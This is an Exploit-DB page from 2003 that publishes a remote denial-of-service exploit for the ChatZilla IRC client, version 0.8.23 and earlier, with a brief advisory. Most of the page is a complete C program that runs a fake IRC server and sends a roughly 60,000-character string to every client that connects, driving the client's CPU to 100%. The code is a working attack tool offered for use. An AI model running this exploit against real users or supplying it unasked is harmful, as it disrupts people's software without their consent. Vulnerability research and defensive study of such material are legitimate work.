ChatZilla 0.8.23 - Remote Denial of Service

EDB-ID:

23150

CVE:

N/A

EDB Verified:

Author:

D4rkGr3y

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2003-09-15

Vulnerable App: 
// source: https://www.securityfocus.com/bid/8627/info

It has been reported that ChatZilla is prone to a denial of service vulnerability. The problem arises as a remote attacker posing as an IRC server sends specially crafted requests to the client containg large strings.

If successful, an attack would lead to a denial of service in the client software.

It is not known if this condition could also be exploited to execute arbitrary code on the client.

ChatZilla versions 0.8.23 and prior are reported to be prone to this issue. 

/*
 *  ChatZilla <=v0.8.23 remote DoS exploit
 *
 *  by m00 Security // www.m00security.org
 *
 *  This sploit creats a fake irc-server on any port. Every connected
 *  ChatZilla-client will have cpu-usage 100%.
 *
 *  Complete advisory:
 *  www.m00security.org/adv/adv003.txt
 *
 *  -d4rkgr3y [d4rk@securitylab.ru]
 */

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define COUNT 60000
#define request "NOTICE AUTH :*** Welcome to fake m00 IRCd\n"

int main(int argc, char **argv)
{
        struct sockaddr_in db;
        int sock, i, len, lame;
        const c = COUNT;
        char buf[60000] = ":Serv 000 user666 :Welcome to the underworld";
        printf("\nChatZilla <=v0.8.23 remote DoS exploit // 
www.m00security.org\n\n");
        if (argc!=2){
                printf("[-] error in params. Usage\n %s port\n",argv[0]);
                exit(1);
        } else {
                printf("[~] Generating evil buf....");
        }
        /* constructing evil buf */
        for (i=0;i<c;i++)
        {
                strcat(buf,"A");
        }
        strcat(buf,"\n");
        printf(" OK\n");
        /* creating fake irc-server */
        db.sin_family = AF_INET;
        db.sin_addr.s_addr = INADDR_ANY;
        db.sin_port = htons(atoi(argv[1]));
        sock = socket(PF_INET, SOCK_STREAM, 0);
        if(bind(sock, (struct sockaddr*)&db, sizeof(db)) == -1) {
                perror("[-] bind()");
                _exit(0);
        }
        /* OK */
        printf("[+] fake ircd created on port %s\n",argv[1]);
        /* waiting for connect */
        listen(sock, SOMAXCONN);
        while(1) {
                printf("[+] User connected. Attacking....");
                len = sizeof(db);
                lame = accept(sock, (struct sockaddr*)&db, &len);
                /* go go go */
                write(lame,request,strlen(request));
                write(lame,buf,strlen(buf));
                printf(" OK\n");
                close(lame);
                close(sock);
                return(0);
        }
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services